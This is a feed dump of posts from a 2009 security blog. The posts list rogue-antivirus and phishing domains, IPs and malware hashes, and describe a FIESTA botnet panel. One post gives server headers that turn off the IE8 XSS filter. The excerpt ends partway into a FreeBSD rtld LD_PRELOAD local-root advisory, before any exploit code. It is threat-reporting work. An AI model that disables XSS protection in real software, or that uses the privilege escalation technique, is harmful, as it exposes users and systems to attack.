scheme="http://www.blogger.com/atom/ns#" term="antivirus" /><title>Rogue Antivirus - Advanced Virus Remover &amp; PC-Scanner2010.com</title><content type="html">Browsing to link hxxxp://pc-scanner2010.com will prompt out scare message that trick users to download the rogue AntiVirus.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_N2xP0b-ECBo/Syo682XfCGI/AAAAAAAAA4Y/MyuKAWNG7Ko/s1600-h/prompt.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 52px;" src="http://3.bp.blogspot.com/_N2xP0b-ECBo/Syo682XfCGI/AAAAAAAAA4Y/MyuKAWNG7Ko/s320/prompt.PNG" alt="" id="BLOGGER_PHOTO_ID_5416206318927022178" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/Syo68wba-fI/AAAAAAAAA4Q/6ZvU05kdUgE/s1600-h/pcscanner.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 279px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/Syo68wba-fI/AAAAAAAAA4Q/6ZvU05kdUgE/s320/pcscanner.PNG" alt="" id="BLOGGER_PHOTO_ID_5416206317332920818" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;hxxxp://advanced-virusremover-2010.com&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/Syo68RJgJmI/AAAAAAAAA4I/MP048wey0ms/s1600-h/advanceremover.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 252px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/Syo68RJgJmI/AAAAAAAAA4I/MP048wey0ms/s320/advanceremover.PNG" alt="" id="BLOGGER_PHOTO_ID_5416206308936263266" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;IP address: &lt;span style="font-weight: bold;"&gt;193.104.110.50&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;advanced-virus-remover-2009.com&lt;br /&gt;advanced-virusremover-2010.com&lt;br /&gt;advanced-virusremover2009.com&lt;br /&gt;avrdownnew5.com&lt;br /&gt;avrdownnew6.com&lt;br /&gt;avrdownnew7.com&lt;br /&gt;avrdownnew8.com&lt;br /&gt;avrdownnew9.com&lt;br /&gt;buy-internet-security2010.com&lt;br /&gt;buy-internetsecurity2010.com&lt;br /&gt;downloadavr13.com&lt;br /&gt;greatcrypt.com&lt;br /&gt;mail.avrdownnew9.com&lt;br /&gt;mail.buy-internet-security2010.com&lt;br /&gt;mail.buy-internetsecurity2010.com&lt;br /&gt;mail.masterhost.co.in&lt;br /&gt;mail.pc-scanner-2011.biz&lt;br /&gt;mail.pc-scanner-2012.net&lt;br /&gt;mail.pc-scanner2010.com&lt;br /&gt;masterhost.co.in&lt;br /&gt;ns1.masterhost.co.in&lt;br /&gt;pc-scanner-2011.biz&lt;br /&gt;pc-scanner-2012.net&lt;br /&gt;pc-scanner2010.com&lt;br /&gt;vsproject.net&lt;br /&gt;www.advanced-virus-remover-2009.com&lt;br /&gt;xxx-white-tube.net&lt;br /&gt;&lt;br /&gt;IP Address: &lt;span style="font-weight: bold;"&gt;91.207.116.55&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;10-open-davinci.com&lt;br /&gt;advancedvirus-remover-2010.com&lt;br /&gt;advancedvirusremover-2009.com&lt;br /&gt;best-scan-pc.biz&lt;br /&gt;best-scan-pc.com&lt;br /&gt;best-scan.com&lt;br /&gt;best-scanpc.com&lt;br /&gt;best-scanpc.net&lt;br /&gt;best-scanpc.org&lt;br /&gt;coolcount2.com&lt;br /&gt;downloadavr6.com&lt;br /&gt;downloadavr8.com&lt;br /&gt;hard-xxx-tube.com&lt;br /&gt;mail.10-open-davinci.com&lt;br /&gt;mail.advanced-virus-remover-2009.com&lt;br /&gt;mail.advanced-virus-remover2010.com&lt;br /&gt;mail.advanced-virusremover-2010.com&lt;br /&gt;mail.advanced-virusremover2009.com&lt;br /&gt;mail.advancedvirus-remover-2010.com&lt;br /&gt;mail.advancedvirusremover-2009.com&lt;br /&gt;mail.best-scan-pc.com&lt;br /&gt;mail.best-scan-pc.net&lt;br /&gt;mail.best-scan.com&lt;br /&gt;mail.best-scan.net&lt;br /&gt;mail.best-scanpc.org&lt;br /&gt;mail.cathrynzfunz.com&lt;br /&gt;mail.coolcount1.com&lt;br /&gt;mail.downloadavr6.com&lt;br /&gt;mail.downloadavr7.com&lt;br /&gt;mail.downloadavr8.com&lt;br /&gt;mail.greatcrypt.com&lt;br /&gt;mail.hard-xxx-tube.com&lt;br /&gt;mail.testavrdown.com&lt;br /&gt;mail.testavrdownnew.com&lt;br /&gt;mail.vscodec-pro.net&lt;br /&gt;mail.vsproject.net&lt;br /&gt;mail.xxx-white-tube.net&lt;br /&gt;mail.xxx-white-tube.org&lt;br /&gt;testavrdownnew.com&lt;br /&gt;vscodec-pro.net&lt;br /&gt;white-xxx-tube.com&lt;br /&gt;www.advancedvirus-remover2009.com&lt;br /&gt;www.advancedvirusremover-2009.com&lt;br /&gt;www.best-scan-pc.com&lt;br /&gt;www.best-scanpc.net&lt;br /&gt;www.best-scanpc.org&lt;br /&gt;www.hard-xxx-tube.com&lt;br /&gt;www.onlinescanxppro.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-909077450720738085?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Zt1bortTMG3fFSMp0hdZjLeJZE8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Zt1bortTMG3fFSMp0hdZjLeJZE8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Zt1bortTMG3fFSMp0hdZjLeJZE8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Zt1bortTMG3fFSMp0hdZjLeJZE8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/909077450720738085/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=909077450720738085" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/909077450720738085?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/909077450720738085?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/HEjFaRGmAe4/rogue-antivirus-advanced-virus-remover.html" title="Rogue Antivirus - Advanced Virus Remover &amp; PC-Scanner2010.com" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_N2xP0b-ECBo/Syo682XfCGI/AAAAAAAAA4Y/MyuKAWNG7Ko/s72-c/prompt.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/rogue-antivirus-advanced-virus-remover.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkQASXgyeyp7ImA9WxBTGUs.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-6175948018296392247</id><published>2009-12-16T04:30:00.000-08:00</published><updated>2009-12-16T04:59:08.693-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-16T04:59:08.693-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Web Security" /><category scheme="http://www.blogger.com/atom/ns#" term="FIESTA" /><category scheme="http://www.blogger.com/atom/ns#" term="Botnet" /><title>FIESTA botnet dominance at Vietnam and India</title><content type="html">Recently found one of the  believed is FIESTA control panel kits showed the victims mainly from Vietnam and India, although the scale of infected systems small compare to other Zeus, Rustock and etc. Strongly believed that this control panel kits just tip of iceberg within "botnet" families.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyjWW064lTI/AAAAAAAAA34/LC1PEUlPSqY/s1600-h/FIESta00.png"&gt;&lt;img style="cursor: pointer; width: 251px; height: 320px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyjWW064lTI/AAAAAAAAA34/LC1PEUlPSqY/s320/FIESta00.png" alt="" id="BLOGGER_PHOTO_ID_5415814239564109106" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;From figure 1, I can make summarized that XP "SP1" are dominance of the victims systems compare to Vista, SP2, 2k and 2k3. There have not surprising that lots of internet users are using SP1 although SP2 and SP3 released few years ago.&lt;br /&gt;&lt;br /&gt;Among the infected systems, Firefox browser lead among other browsers used to surf internet. &lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_N2xP0b-ECBo/SyjWXDOQeJI/AAAAAAAAA4A/5P2q-NBSzHQ/s1600-h/FIESta01.png"&gt;&lt;img style="cursor: pointer; width: 270px; height: 320px;" src="http://3.bp.blogspot.com/_N2xP0b-ECBo/SyjWXDOQeJI/AAAAAAAAA4A/5P2q-NBSzHQ/s320/FIESta01.png" alt="" id="BLOGGER_PHOTO_ID_5415814243403462802" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Figure 2 showed list of the possible"Luckysploits" exploits attempts on victims systems, consist of COM, MDAC, XML Parsing, Snapshot, WFI, PDF, VML2, FF behavior and NCT.&lt;br /&gt;&lt;br /&gt;The downloaded executable file gain minor rate from Virustotal, and ThreatExpert reports can be review at &lt;a href="http://www.threatexpert.com/report.aspx?md5=0095da1c241cb9056b67425dab3d7283"&gt;http://www.threatexpert.com/report.aspx?md5=0095da1c241cb9056b67425dab3d7283&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-6175948018296392247?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/vwJLVrIjfSIQrxopfMBC3OcN2vk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vwJLVrIjfSIQrxopfMBC3OcN2vk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/vwJLVrIjfSIQrxopfMBC3OcN2vk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vwJLVrIjfSIQrxopfMBC3OcN2vk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/6175948018296392247/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=6175948018296392247" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/6175948018296392247?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/6175948018296392247?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/ha3HFbJlUQk/fiesta-botnet-dominance-at-vietnam-and.html" title="FIESTA botnet dominance at Vietnam and India" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyjWW064lTI/AAAAAAAAA34/LC1PEUlPSqY/s72-c/FIESta00.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/fiesta-botnet-dominance-at-vietnam-and.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkYHRHw8cSp7ImA9WxBXEEo.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-5108590403974765945</id><published>2009-12-14T05:35:00.000-08:00</published><updated>2010-01-21T02:35:35.279-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-21T02:35:35.279-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rogue" /><category scheme="http://www.blogger.com/atom/ns#" term="Web Security" /><category scheme="http://www.blogger.com/atom/ns#" term="Bogus" /><title>Rogue Antivirus- Internet Security 2010</title><content type="html">Internet Security 2010 is another phony security software that look similar to legitimate security software.&lt;br /&gt;&lt;br /&gt;Rogue software usually use scare tactics that trick users with false warnings and alert users to buy the product.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_N2xP0b-ECBo/SyZATEA62FI/AAAAAAAAA3k/Va_Vssascao/s1600-h/av2010.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 180px;" src="http://3.bp.blogspot.com/_N2xP0b-ECBo/SyZATEA62FI/AAAAAAAAA3k/Va_Vssascao/s320/av2010.PNG" alt="" id="BLOGGER_PHOTO_ID_5415086298198890578" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Installer "IS2010.exe"&lt;br /&gt;File&lt;br /&gt;MD5: 0x3199C032F173066DD0E9DB1E7D3C2F67&lt;br /&gt;SHA-1: 0x761B2E2C291527196B920CFD29480422854CD523&lt;br /&gt;&lt;div id=":j4" class="ii gt"&gt; File size: 1,414,656 bytes&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;http://www.threatexpert.com/report.aspx?md5=3199c032f173066dd0e9db1e7d3c2f67&lt;br /&gt;&lt;br /&gt;Another rogue security software website that share same IP address with "Internet Security 2010"&lt;br /&gt;&lt;br /&gt;Below is the screenshot that copy-exactly from the legitimate CleanMyPC Registry Cleaner.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/SyZATSV3PDI/AAAAAAAAA3s/5DUxcKBY59Q/s1600-h/cleanmypc.PNG"&gt;&lt;img style="cursor: pointer; width: 287px; height: 320px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/SyZATSV3PDI/AAAAAAAAA3s/5DUxcKBY59Q/s320/cleanmypc.PNG" alt="" id="BLOGGER_PHOTO_ID_5415086302044830770" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The legitimate website is &lt;a href="http://www.registry-cleaner.net/"&gt;http://www.registry-cleaner.net/&lt;/a&gt; with IP &lt;span class="ipaddr"&gt;66.39.16.135 &lt;/span&gt;. Be aware if the incorrect web link appear in browser address bar.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-5108590403974765945?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/l7q8BmjLnyJY3D5B4hk_30tdgc8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/l7q8BmjLnyJY3D5B4hk_30tdgc8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/l7q8BmjLnyJY3D5B4hk_30tdgc8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/l7q8BmjLnyJY3D5B4hk_30tdgc8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/5108590403974765945/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=5108590403974765945" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/5108590403974765945?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/5108590403974765945?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/J4n1mT942Ns/rogue-antivirus-internet-security-2010.html" title="Rogue Antivirus- Internet Security 2010" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_N2xP0b-ECBo/SyZATEA62FI/AAAAAAAAA3k/Va_Vssascao/s72-c/av2010.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/rogue-antivirus-internet-security-2010.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUEBQns_fip7ImA9WxBTF0Q.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-6238733320194810624</id><published>2009-12-14T05:16:00.000-08:00</published><updated>2009-12-14T05:34:13.546-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-14T05:34:13.546-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="phishing" /><category scheme="http://www.blogger.com/atom/ns#" term="Facebook" /><title>Phishing - Fake Facebook</title><content type="html">Be caution when you login to the famous social networking portal "Facebook" like figure below, if you noticed the address bar carefully, actually it's a Facebook phishing site.&lt;br /&gt;&lt;br /&gt;Figure 2 showed that the username and password used to login the Facebook. Several accounts were recorded in that fake "Facebook".&lt;br /&gt;&lt;br /&gt;If you suspect your Facebook account was compromised, immediately change the password at the first place.&lt;br /&gt;&lt;br /&gt;Figure1:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyY8Tjzr9QI/AAAAAAAAA3U/Ynm9yZ0VqX8/s1600-h/fb.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 150px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyY8Tjzr9QI/AAAAAAAAA3U/Ynm9yZ0VqX8/s320/fb.PNG" alt="" id="BLOGGER_PHOTO_ID_5415081908686812418" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Figure2:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyY8T5rajWI/AAAAAAAAA3c/ryXBBgVRn9c/s1600-h/passwd-edit.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 209px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyY8T5rajWI/AAAAAAAAA3c/ryXBBgVRn9c/s320/passwd-edit.PNG" alt="" id="BLOGGER_PHOTO_ID_5415081914557697378" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;IP address:&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;66.45.237.212&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;69.10.48.106&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Domains sharing same IP address:&lt;br /&gt;&lt;br /&gt;05748.t35.com&lt;br /&gt;3sbe.t35.com&lt;br /&gt;accessonlineupdate.t35.com&lt;br /&gt;angelsaddiavolo.t35.com&lt;br /&gt;anggit.t35.com&lt;br /&gt;azitromed.t35.com&lt;br /&gt;banameex-sesion.t35.com&lt;br /&gt;banamex-netkey.t35.com&lt;br /&gt;barnamex.t35.com&lt;br /&gt;bizboost.t35.com&lt;br /&gt;bizbooster.t35.com&lt;br /&gt;bl-lit.t35.com&lt;br /&gt;btrl24.t35.com&lt;br /&gt;demo.t35.com&lt;br /&gt;devilzone.t35.com&lt;br /&gt;dkz1.t35.com&lt;br /&gt;falilat.t35.com&lt;br /&gt;finivest.t35.com&lt;br /&gt;freeware-ad.t35.com&lt;br /&gt;friends09.t35.com&lt;br /&gt;ghhghg.t35.com&lt;br /&gt;jadult.t35.com&lt;br /&gt;meetsaferbuds.t35.com&lt;br /&gt;montagemfotos.t35.com&lt;br /&gt;noriko.t35.com&lt;br /&gt;ns2.t35.com&lt;br /&gt;ogard.t35.com&lt;br /&gt;oijvhalaocp.t35.com&lt;br /&gt;punjat.t35.com&lt;br /&gt;raghil.t35.com&lt;br /&gt;realestateprofiles.t35.com&lt;br /&gt;saadullah.t35.com&lt;br /&gt;spyware-re.t35.com&lt;br /&gt;texas-accountpoker.t35.com&lt;br /&gt;vital.t35.com&lt;br /&gt;wachovlogsinfoonline.t35.com&lt;br /&gt;www.azitromed.t35.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-6238733320194810624?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/DRxu-p7-24ZzL4ct91Odcuu7RTE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DRxu-p7-24ZzL4ct91Odcuu7RTE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/DRxu-p7-24ZzL4ct91Odcuu7RTE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DRxu-p7-24ZzL4ct91Odcuu7RTE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/6238733320194810624/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=6238733320194810624" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/6238733320194810624?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/6238733320194810624?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/US_PooICqDQ/phishing-fake-facebook.html" title="Phishing - Fake Facebook" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyY8Tjzr9QI/AAAAAAAAA3U/Ynm9yZ0VqX8/s72-c/fb.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/phishing-fake-facebook.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUAAR34zeCp7ImA9WxBTEkU.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-4314774384648709036</id><published>2009-12-08T07:46:00.000-08:00</published><updated>2009-12-08T07:55:46.080-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-08T07:55:46.080-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="IE8" /><category scheme="http://www.blogger.com/atom/ns#" term="news" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><title>Close IE 8 Cross-Site Scripting (XSS) Filter</title><content type="html">As aware that we has option to turn-off XSS filter functionality in IE 8 (client side), we also have option to turn-off XSS functionality at Server side by adding under Http Header.&lt;br /&gt;&lt;br /&gt;PHP:&lt;br /&gt;header("x-xss-Protection:0");&lt;br /&gt;&lt;br /&gt;ASP.net.config:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sx52mTnr57I/AAAAAAAAA3M/iyrMMrfGhAM/s1600-h/asp.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 200px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sx52mTnr57I/AAAAAAAAA3M/iyrMMrfGhAM/s320/asp.PNG" alt="" id="BLOGGER_PHOTO_ID_5412894202619750322" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;system.webserver&gt;&lt;httpprotocol&gt;&lt;customheaders&gt;&lt;clear&gt;       &lt;add name=" X-XSS-Protection" value="0"&gt;&lt;/add&gt;&lt;/clear&gt;&lt;/customheaders&gt;&lt;br /&gt;reference: &lt;a href="http://msdn.microsoft.com/zh-cn/library/dd565647%28en-us,VS.85%29.aspx"&gt;http://msdn.microsoft.com/zh-cn/library/dd565647(en-us,VS.85).aspx&lt;/a&gt;&lt;/httpprotocol&gt;&lt;/system.webserver&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-4314774384648709036?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/qTVXQsV6lrdpwHY0_4Gzvc0aqOM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/qTVXQsV6lrdpwHY0_4Gzvc0aqOM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/qTVXQsV6lrdpwHY0_4Gzvc0aqOM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/qTVXQsV6lrdpwHY0_4Gzvc0aqOM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/4314774384648709036/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=4314774384648709036" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/4314774384648709036?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/4314774384648709036?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/CGbV2pnbUV4/close-ie-8-cross-site-scripting-xss.html" title="Close IE 8 Cross-Site Scripting (XSS) Filter" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sx52mTnr57I/AAAAAAAAA3M/iyrMMrfGhAM/s72-c/asp.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/close-ie-8-cross-site-scripting-xss.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0YHRXw7fSp7ImA9WxNaGUk.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-5335616297351237205</id><published>2009-12-04T09:48:00.000-08:00</published><updated>2009-12-04T09:52:14.205-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-04T09:52:14.205-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Rootkit" /><category scheme="http://www.blogger.com/atom/ns#" term="freebsd" /><category scheme="http://www.blogger.com/atom/ns#" term="news" /><title>FreeBSD local r00t zeroday</title><content type="html">Reference source: &lt;a href="http://seclists.org/fulldisclosure/2009/Nov/371"&gt;http://seclists.org/fulldisclosure/2009/Nov/371&lt;/a&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;** FreeBSD local r00t 0day&lt;/div&gt;&lt;div&gt;Discovered &amp;amp; Exploited by Nikolaos Rangos also known as Kingcope.&lt;/div&gt;&lt;div&gt;Nov 2009 "BiG TiME"&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;There is an unbelievable simple local r00t bug in recent FreeBSD versions.&lt;/div&gt;&lt;div&gt;I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;The bug resides in the Run-Time Link-Editor (rtld).&lt;/div&gt;&lt;div&gt;Normally rtld does not allow dangerous environment variables like LD_PRELOAD&lt;/div&gt;&lt;div&gt;to be set when executing setugid binaries like "ping" or "su".&lt;/div&gt;&lt;div&gt;With a rather simple technique rtld can be tricked into&lt;/div&gt;&lt;div&gt;accepting LD variables even on setugid binaries.&lt;/div&gt;&lt;div&gt;See the attached exploit for details.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Example exploiting 